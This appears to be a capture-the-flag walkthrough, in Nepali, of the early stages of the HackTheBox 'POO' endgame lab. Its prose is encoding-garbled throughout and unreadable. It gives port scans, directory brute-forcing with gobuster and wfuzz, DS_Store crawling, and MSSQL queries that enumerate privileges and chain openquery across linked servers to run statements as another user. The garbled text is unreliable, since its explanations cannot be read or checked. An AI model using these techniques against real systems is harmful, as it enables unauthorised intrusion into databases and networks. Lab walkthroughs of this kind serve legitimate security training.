HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

рдпрд╕ рд▓реЗрдЦрдорд╛ рд╣рд╛рдореА рдХреЗрд╡рд▓ рдПрдХ рдореЗрд╕рд┐рдирдХреЛ рдорд╛рддреНрд░ рд╣реЛрдЗрди, рддрд░ рд╕рд╛рдЗрдЯрдмрд╛рдЯ рд╕рдореНрдкреВрд░реНрдг рдорд┐рдиреА-рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛рдХреЛ рдорд╛рд░реНрдЧрдХреЛ рд╡рд┐рд╢реНрд▓реЗрд╖рдг рдЧрд░реНрдиреЗрдЫреМрдВред HackTheBox.

рд╡рд░реНрдгрдирдорд╛ рдЙрд▓реНрд▓реЗрдЦ рдЧрд░рд┐рдП рдЕрдиреБрд╕рд╛рд░, POO рд╕рд╛рдиреЛ рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рд╡рд╛рддрд╛рд╡рд░рдгрдорд╛ рдЖрдХреНрд░рдордгрдХрд╛ рд╕рдмреИ рдЪрд░рдгрд╣рд░реВрдорд╛ рд╕реАрдкрд╣рд░реВ рдкрд░реАрдХреНрд╖рдг рдЧрд░реНрди рдбрд┐рдЬрд╛рдЗрди рдЧрд░рд┐рдПрдХреЛ рд╣реЛред рд▓рдХреНрд╖реНрдп рднрдиреЗрдХреЛ рдЙрдкрд▓рдмреНрдз рд╣реЛрд╕реНрдЯрд╕рдБрдЧ рд╕рдореНрдЭреМрддрд╛ рдЧрд░реНрдиреБ, рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░рд╣рд░реВ рдмрдврд╛рдЙрдиреЗ, рд░ рдЕрдиреНрддрддрдГ рдкреНрд░рдХреНрд░рд┐рдпрд╛рдорд╛ 5 рдЭрдгреНрдбрд╛рд╣рд░реВ рд╕рдЩреНрдХрд▓рди рдЧрд░реЗрд░ рд╕рдореНрдкреВрд░реНрдг рдбреЛрдореЗрдирд▓рд╛рдИ рд╕рдореНрдЭреМрддрд╛ рдЧрд░реНрдиреБ рд╣реЛред

рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛рдорд╛ рдЬрдбрд╛рди VPN рдорд╛рд░реНрдлрдд рдЫред рдХрд╛рдо рдЧрд░реНрдиреЗ рдХрдореНрдкреНрдпреБрдЯрд░ рд╡рд╛ рддрдкрд╛рдИрдВрдХреЛ рд▓рд╛рдЧрд┐ рдорд╣рддреНрддреНрд╡рдкреВрд░реНрдг рдбреЗрдЯрд╛ рднрдПрдХреЛ рд╣реЛрд╕реНрдЯрдмрд╛рдЯ рдЬрдбрд╛рди рдирдЧрд░реНрди рд╕рд┐рдлрд╛рд░рд┐рд╕ рдЧрд░рд┐рдиреНрдЫ, рдХрд┐рдирдХрд┐ рддрдкрд╛рдИрдВ рд╕реВрдЪрдирд╛ рд╕реБрд░рдХреНрд╖рд╛рдХреЛ рдмрд╛рд░реЗрдорд╛ рдХреЗрд╣реА рдерд╛рд╣рд╛ рднрдПрдХрд╛ рд╡реНрдпрдХреНрддрд┐рд╣рд░реВрд╕рдБрдЧ рдирд┐рдЬреА рдиреЗрдЯрд╡рд░реНрдХрдорд╛ рдкреНрд░рд╡реЗрд╢ рдЧрд░реНрдиреБрд╣реБрдиреНрдЫ ЁЯЩВ

рд╕рдВрдЧрдардирд╛рддреНрдордХ рдЬрд╛рдирдХрд╛рд░реА
рдирдпрд╛рдБ рд▓реЗрдЦ, рд╕рдлреНрдЯрд╡реЗрдпрд░ рд░ рдЕрдиреНрдп рдЬрд╛рдирдХрд╛рд░реАрдХреЛ рдмрд╛рд░реЗрдорд╛ рдерд╛рд╣рд╛ рдкрд╛рдЙрдирдХреЛ рд▓рд╛рдЧрд┐ рдореИрд▓реЗ рд╕рд┐рд░реНрдЬрдирд╛ рдЧрд░реЗрдХреЛ рдЫреБ рдЯреЗрд▓рд┐рдЧреНрд░рд╛рдо рдЪреНрдпрд╛рдирд▓ ╨╕ рдХреБрдиреИ рдкрдирд┐ рдореБрджреНрджрд╛рд╣рд░реВ рдЫрд▓рдлрд▓ рдЧрд░реНрди рд╕рдореВрд╣ IIKB рдХреЛ рдХреНрд╖реЗрддреНрд░рдорд╛ред рд╕рд╛рдереИ рддрдкрд╛рдИрдХреЛ рд╡реНрдпрдХреНрддрд┐рдЧрдд рдЕрдиреБрд░реЛрдз, рдкреНрд░рд╢реНрди, рд╕реБрдЭрд╛рд╡ рд░ рд╕рд┐рдлрд╛рд░рд┐рд╕рд╣рд░реВ рд╣реЗрд░реЗрд░ рд╕рдмреИрд▓рд╛рдИ рдЬрд╡рд╛рдл рджрд┐рдиреЗрдЫреБред.

рд╕рдмреИ рдЬрд╛рдирдХрд╛рд░реА рд╢реИрдХреНрд╖рд┐рдХ рдЙрджреНрджреЗрд╢реНрдпрдХрд╛ рд▓рд╛рдЧрд┐ рдорд╛рддреНрд░ рдкреНрд░рджрд╛рди рдЧрд░рд┐рдПрдХреЛ рдЫред рдпрд╕ рдХрд╛рдЧрдЬрд╛рддрдХреЛ рд▓реЗрдЦрдХрд▓реЗ рдпрд╕ рдХрд╛рдЧрдЬрд╛рддрдХреЛ рдЕрдзреНрдпрдпрдирдХреЛ рдкрд░рд┐рдгрд╛рдо рд╕реНрд╡рд░реВрдк рдкреНрд░рд╛рдкреНрдд рдЬреНрдЮрд╛рди рд░ рд╡рд┐рдзрд┐рд╣рд░реВ рдкреНрд░рдпреЛрдЧ рдЧрд░реНрджрд╛ рдХрд╕реИрд▓рд╛рдИ рднрдПрдХреЛ рдХреНрд╖рддрд┐рдХреЛ рд▓рд╛рдЧрд┐ рдХреБрдиреИ рдЬрд┐рдореНрдореЗрд╡рд╛рд░реА рд▓рд┐рдиреЗ рдЫреИрдиред

рдкрд░рд┐рдЪрдп

рдпреЛ рдЕрдиреНрддреНрдп рдЦреЗрд▓рдорд╛ рджреБрдИрд╡рдЯрд╛ рдореЗрд╕рд┐рдирд╣рд░реВ рд╣реБрдиреНрдЫрдиреН рд░ рдпрд╕рдорд╛ рел рд╡рдЯрд╛ рдЭрдгреНрдбрд╛рд╣рд░реВ рд╣реБрдиреНрдЫрдиреНред

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

рдЙрдкрд▓рдмреНрдз рд╣реЛрд╕реНрдЯрдХреЛ рд╡рд┐рд╡рд░рдг рд░ рдареЗрдЧрд╛рдирд╛ рдкрдирд┐ рджрд┐рдЗрдПрдХреЛ рдЫред

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

рд╕реБрд░реБ рдЧрд░реМрдВ!

рдкреБрди: рдЭрдгреНрдбрд╛

рдпреЛ рдореЗрд╕рд┐рдирдХреЛ 10.13.38.11 рдХреЛ IP рдареЗрдЧрд╛рдирд╛ рдЫ рдЬреБрди рдореИрд▓реЗ /etc/hosts рдорд╛ рдердкреНрдЫреБред
10.13.38.11 poo.htb

рдкрд╣рд┐рд▓реЛ рдЪрд░рдг рдЦреБрд▓рд╛ рдкреЛрд░реНрдЯрд╣рд░реВ рд╕реНрдХреНрдпрд╛рди рдЧрд░реНрди рд╣реЛред рд╕рдмреИ рдкреЛрд░реНрдЯрд╣рд░реВ nmap рдорд╛рд░реНрдлрдд рд╕реНрдХреНрдпрд╛рди рдЧрд░реНрди рд▓рд╛рдореЛ рд╕рдордп рд▓рд╛рдЧреНрдиреЗ рднрдПрдХреЛрд▓реЗ, рдо рдпрд╕рд▓рд╛рдИ рдкрд╣рд┐рд▓реЗ masscan рдорд╛рд░реНрдлрдд рдЧрд░реНрдиреЗрдЫреБред рд╣рд╛рдореА 0pps рдорд╛ tun500 рдЗрдиреНрдЯрд░рдлреЗрд╕рдмрд╛рдЯ рд╕рдмреИ TCP рд░ UDP рдкреЛрд░реНрдЯрд╣рд░реВ рд╕реНрдХреНрдпрд╛рди рдЧрд░реНрдЫреМрдВред

sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

рдЕрдм, рдкреЛрд░реНрдЯрд╣рд░реВрдорд╛ рдЪрд▓реНрдиреЗ рд╕реЗрд╡рд╛рд╣рд░реВрдХреЛ рдмрд╛рд░реЗрдорд╛ рдердк рд╡рд┐рд╕реНрддреГрдд рдЬрд╛рдирдХрд╛рд░реА рдкреНрд░рд╛рдкреНрдд рдЧрд░реНрди, -A рд╡рд┐рдХрд▓реНрдкрдХреЛ рд╕рд╛рде рд╕реНрдХреНрдпрд╛рди рдЪрд▓рд╛рдЙрдиреБрд╣реЛрд╕реНред

nmap -A poo.htb -p80,1433

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

рддреНрдпрд╕реИрд▓реЗ рд╣рд╛рдореАрд╕рдБрдЧ IIS рд░ MSSQL рд╕реЗрд╡рд╛рд╣рд░реВ рдЫрдиреНред рдпрд╕ рдЕрд╡рд╕реНрдерд╛рдорд╛, рд╣рд╛рдореА рдбреЛрдореЗрди рд░ рдХрдореНрдкреНрдпреБрдЯрд░рдХреЛ рд╡рд╛рд╕реНрддрд╡рд┐рдХ DNS рдирд╛рдо рдлреЗрд▓рд╛ рдкрд╛рд░реНрдиреЗрдЫреМрдВред рд╡реЗрдм рд╕рд░реНрднрд░рдорд╛ рд╣рд╛рдореАрд▓рд╛рдИ IIS рдЧреГрд╣ рдкреГрд╖реНрдарджреНрд╡рд╛рд░рд╛ рд╕реНрд╡рд╛рдЧрдд рдЫред

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

рдбрд╛рдЗрд░реЗрдХреНрдЯрд░реАрд╣рд░реВрдорд╛ рдкреБрдирд░рд╛рд╡реГрддреНрддрд┐ рдЧрд░реМрдВред рдо рдпрд╕рдХреЛ рд▓рд╛рдЧрд┐ рдЧреЛрдмрд╕реНрдЯрд░ рдкреНрд░рдпреЛрдЧ рдЧрд░реНрджрдЫреБред рдкреНрдпрд╛рд░рд╛рдорд┐рдЯрд░рд╣рд░реВрдорд╛ рд╣рд╛рдореАрд▓реЗ рд╕реНрдЯреНрд░рд┐рдорд╣рд░реВрдХреЛ рд╕рдВрдЦреНрдпрд╛ 128 (-t), URL (-u), рд╢рдмреНрджрдХреЛрд╢ (-w) рд░ рд╣рд╛рдореАрд▓рд╛рдИ рд░реБрдЪрд┐ рд░рд╛рдЦреНрдиреЗ рд╡рд┐рд╕реНрддрд╛рд░рд╣рд░реВ (-x) рдирд┐рд░реНрджрд┐рд╖реНрдЯ рдЧрд░реНрдЫреМрдВред

gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

рдпрд╕рд▓реЗ рд╣рд╛рдореАрд▓рд╛рдИ /admin рдбрд╛рдЗрд░реЗрдХреНрдЯрд░реА, рд╕рд╛рдереИ рдкрд╣реБрдБрдЪрдпреЛрдЧреНрдп рдбреЗрд╕реНрдХрдЯрдк рд╕реЗрд╡рд╛ DS_Store рдлрд╛рдЗрд▓рдХреЛ рд▓рд╛рдЧрд┐ HTTP рдкреНрд░рдорд╛рдгреАрдХрд░рдг рджрд┐рдиреНрдЫред .DS_Store рдлрд╛рдЗрд▓рд╣рд░реВ рд╣реБрдиреН рдЬрд╕рд▓реЗ рдлреЛрд▓реНрдбрд░рдХрд╛ рд▓рд╛рдЧрд┐ рдЕрдиреБрдХреВрд▓ рд╕реЗрдЯрд┐рдЩрд╣рд░реВ рднрдгреНрдбрд╛рд░ рдЧрд░реНрджрдЫ, рдЬрд╕реНрддреИ рдлрд╛рдЗрд▓рд╣рд░реВрдХреЛ рд╕реВрдЪреА, рдЖрдЗрдХрди рд╕реНрдерд╛рдирд╣рд░реВ, рд░ рдЪрдпрди рдЧрд░рд┐рдПрдХреЛ рдкреГрд╖реНрдарднреВрдорд┐ рдЫрд╡рд┐ред рдпрд╕реНрддреЛ рдлрд╛рдЗрд▓ рд╡реЗрдм рд╡рд┐рдХрд╛рд╕рдХрд░реНрддрд╛рд╣рд░реВрдХреЛ рд╡реЗрдм рд╕рд░реНрднрд░ рдбрд╛рдЗрд░реЗрдХреНрдЯрд░реАрдорд╛ рд╕рдорд╛рдкреНрдд рд╣реБрди рд╕рдХреНрдЫред рдпрд╕ рддрд░рд┐рдХрд╛рд▓реЗ рд╣рд╛рдореА рдбрд╛рдЗрд░реЗрдХреНрдЯрд░реАрдХрд╛ рд╕рд╛рдордЧреНрд░реАрд╣рд░реВрдХреЛ рдмрд╛рд░реЗрдорд╛ рдЬрд╛рдирдХрд╛рд░реА рдкреНрд░рд╛рдкреНрдд рдЧрд░реНрдЫреМрдВред рдпрд╕рдХрд╛ рд▓рд╛рдЧрд┐ рддрдкрд╛рдИрд▓реЗ рдкреНрд░рдпреЛрдЧ рдЧрд░реНрди рд╕рдХреНрдиреБрд╣реБрдиреНрдЫ DS_Store рдХреНрд░рд▓рд░.

python3 dsstore_crawler.py -i http://poo.htb/

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

рд╣рд╛рдореАрд▓реЗ рдбрд╛рдЗрд░реЗрдХреНрдЯрд░реАрдХреЛ рд╕рд╛рдордЧреНрд░реАрд╣рд░реВ рдкрд╛рдЙрдБрдЫреМрдВред рдпрд╣рд╛рдБ рд╕рдмреИрднрдиреНрджрд╛ рдЪрд╛рдЦрд▓рд╛рдЧреНрджреЛ рдХреБрд░рд╛ /dev рдбрд╛рдЗрд░реЗрдХреНрдЯрд░реА рд╣реЛ, рдЬрд╕рдмрд╛рдЯ рд╣рд╛рдореА рд╕реНрд░реЛрддрд╣рд░реВ рд░ db рдлрд╛рдЗрд▓рд╣рд░реВ рджреБрдИ рд╢рд╛рдЦрд╛рд╣рд░реВрдорд╛ рд╣реЗрд░реНрди рд╕рдХреНрдЫреМрдВред рддрд░ рдпрджрд┐ рд╕реЗрд╡рд╛ IIS ShortName рд▓рд╛рдИ рдХрдордЬреЛрд░ рдЫ рднрдиреЗ рд╣рд╛рдореА рдлрд╛рдЗрд▓ рд░ рдбрд╛рдЗрд░реЗрдХреНрдЯрд░реА рдирд╛рдорд╣рд░реВрдХреЛ рдкрд╣рд┐рд▓реЛ 6 рд╡рд░реНрдгрд╣рд░реВ рдкреНрд░рдпреЛрдЧ рдЧрд░реНрди рд╕рдХреНрдЫреМрдВред рддрдкрд╛рдИрдВ рдкреНрд░рдпреЛрдЧ рдЧрд░реЗрд░ рдпреЛ рдЬреЛрдЦрд┐рдо рд▓рд╛рдЧрд┐ рдЬрд╛рдБрдЪ рдЧрд░реНрди рд╕рдХреНрдиреБрд╣реБрдиреНрдЫ IIS рдЫреЛрдЯреЛ рдирд╛рдо рд╕реНрдХреНрдпрд╛рдирд░.

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

рд░ рд╣рд╛рдореАрд▓реЗ рдПрдЙрдЯрд╛ рдкрд╛рда рдлрд╛рдЗрд▓ рдлреЗрд▓рд╛ рдкрд╛рд░реНрдЫреМрдВ рдЬреБрди "poo_co" рдмрд╛рдЯ рд╕реБрд░реБ рд╣реБрдиреНрдЫред рдЕрдм рдХреЗ рдЧрд░реНрдиреЗ рдерд╛рд╣рд╛ рдЫреИрди, рдореИрд▓реЗ "co" рдмрд╛рдЯ рд╕реБрд░реБ рд╣реБрдиреЗ рд╕рдмреИ рд╢рдмреНрджрд╣рд░реВ рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛рд╣рд░реВрдХреЛ рд╢рдмреНрджрдХреЛрд╢рдмрд╛рдЯ рдорд╛рддреНрд░ рдЪрдпрди рдЧрд░реЗрдВред

cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt

рд░ wfuzz рд╕рдВрдЧ рдкреБрдирд░рд╛рд╡реГрддреНрддрд┐ рдЧрд░реНрдиреБрд╣реЛрд╕реНред

wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

рд░ рд╣рд╛рдореА рд╕рд╣реА рд╢рдмреНрдж рдлреЗрд▓рд╛ рдкрд╛рд░реНрдЫреМрдВ! рд╣рд╛рдореА рдпреЛ рдлрд╛рдЗрд▓ рд╣реЗрд░реНрдЫреМрдВ, рдкреНрд░рдорд╛рдгрд╣рд░реВ рдмрдЪрдд рдЧрд░реНрдЫреМрдВ (DBNAME рдкреНрдпрд╛рд░рд╛рдорд┐рдЯрд░ рджреНрд╡рд╛рд░рд╛ рдиреНрдпрд╛рдп рдЧрд░реНрджреИ, рддрд┐рдиреАрд╣рд░реВ MSSQL рдмрд╛рдЯ рд╣реБрдиреН)ред

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

рд╣рд╛рдореА рдЭрдгреНрдбрд╛ рд╕рдорд░реНрдкрдг рдЧрд░реНрдЫреМрдВ рд░ рд╣рд╛рдореА реиреж% рдЕрдЧрд╛рдбрд┐ рдмрдвреНрдЫреМрдВред

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

рд╣рд╛рд╣рд╛ рдЭрдгреНрдбрд╛

рд╣рд╛рдореА MSSQL рдорд╛ рдЬрдбрд╛рди рдЧрд░реНрдЫреМрдВ, рдо DBeaver рдкреНрд░рдпреЛрдЧ рдЧрд░реНрдЫреБред

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

рд╣рд╛рдореАрд▓реЗ рдпрд╕ рдбрд╛рдЯрд╛рдмреЗрд╕рдорд╛ рдЪрд╛рдЦрд▓рд╛рдЧреНрджреЛ рдХреБрд░рд╛ рдлреЗрд▓рд╛ рдкрд╛рд░реЗрдиреМрдВ, SQL рд╕рдореНрдкрд╛рджрдХ рд╕рд┐рд░реНрдЬрдирд╛ рдЧрд░реМрдВ рд░ рддреНрдпрд╣рд╛рдБ рдХреЗ рдкреНрд░рдпреЛрдЧрдХрд░реНрддрд╛рд╣рд░реВ рдЫрдиреН рднрдиреЗрд░ рдЬрд╛рдБрдЪ рдЧрд░реМрдВред

SELECT name FROM master..syslogins;

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

рд╣рд╛рдореАрд╕рдБрдЧ рджреБрдИ рдкреНрд░рдпреЛрдЧрдХрд░реНрддрд╛ рдЫрдиреНред рд╣рд╛рдореНрд░реЛ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдЬрд╛рдБрдЪ рдЧрд░реМрдВред

SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

рддрд╕рд░реНрде, рдХреБрдиреИ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░рд╣рд░реВ рдЫреИрдирдиреНред рд▓рд┐рдЩреНрдХ рдЧрд░рд┐рдПрдХрд╛ рд╕рд░реНрднрд░рд╣рд░реВ рд╣реЗрд░реМрдВ, рдореИрд▓реЗ рдпрд╕ рдкреНрд░рд╡рд┐рдзрд┐рдХреЛ рдмрд╛рд░реЗрдорд╛ рд╡рд┐рд╕реНрддреГрдд рд░реВрдкрдорд╛ рд▓реЗрдЦреЗрдХреЛ рдЫреБ рдпрд╣рд╛рдБ.

SELECT * FROM master..sysservers;

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

рддреНрдпрд╕реИрд▓реЗ рд╣рд╛рдореА рдЕрд░реНрдХреЛ SQL рд╕рд░реНрднрд░ рдлреЗрд▓рд╛ рдкрд╛рд░реНрдЫреМрдВред Openquery() рдкреНрд░рдпреЛрдЧ рдЧрд░реЗрд░ рдпреЛ рд╕рд░реНрднрд░рдорд╛ рдЖрджреЗрд╢рд╣рд░реВрдХреЛ рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрди рдЬрд╛рдБрдЪ рдЧрд░реМрдВред

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

рд░ рд╣рд╛рдореА рдХреНрд╡реЗрд░реА рд░реВрдЦ рдкрдирд┐ рдирд┐рд░реНрдорд╛рдг рдЧрд░реНрди рд╕рдХреНрдЫреМрдВред

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');

рдмрд┐рдиреНрджреБ рдпреЛ рд╣реЛ рдХрд┐ рдЬрдм рд╣рд╛рдореА рд▓рд┐рдЩреНрдХ рдЧрд░рд┐рдПрдХреЛ рд╕рд░реНрднрд░рдорд╛ рдЕрдиреБрд░реЛрдз рдЧрд░реНрдЫреМрдВ, рдЕрдиреБрд░реЛрдз рдЕрд░реНрдХреЛ рдкреНрд░рдпреЛрдЧрдХрд░реНрддрд╛рдХреЛ рд╕рдиреНрджрд░реНрднрдорд╛ рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрди рдЧрд░рд┐рдиреНрдЫ! рд╣рд╛рдореА рдХреБрди рдкреНрд░рдпреЛрдЧрдХрд░реНрддрд╛рдХреЛ рд╕рдиреНрджрд░реНрднрдорд╛ рд▓рд┐рдЩреНрдХ рдЧрд░рд┐рдПрдХреЛ рд╕рд░реНрднрд░рдорд╛ рдХрд╛рдо рдЧрд░рд┐рд░рд╣реЗрдХрд╛ рдЫреМрдВ рд╣реЗрд░реМрдВред

SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

рд░ рдЕрдм рд╣реЗрд░реМрдВ рдХреБрди рд╕рдиреНрджрд░реНрднрдорд╛ рд╣рд╛рдореНрд░реЛ рд▓рд┐рдЩреНрдХ рдЧрд░рд┐рдПрдХреЛ рд╕рд░реНрднрд░рдмрд╛рдЯ рдЕрдиреБрд░реЛрдз рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрди рд╣реБрдиреНрдЫ!

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

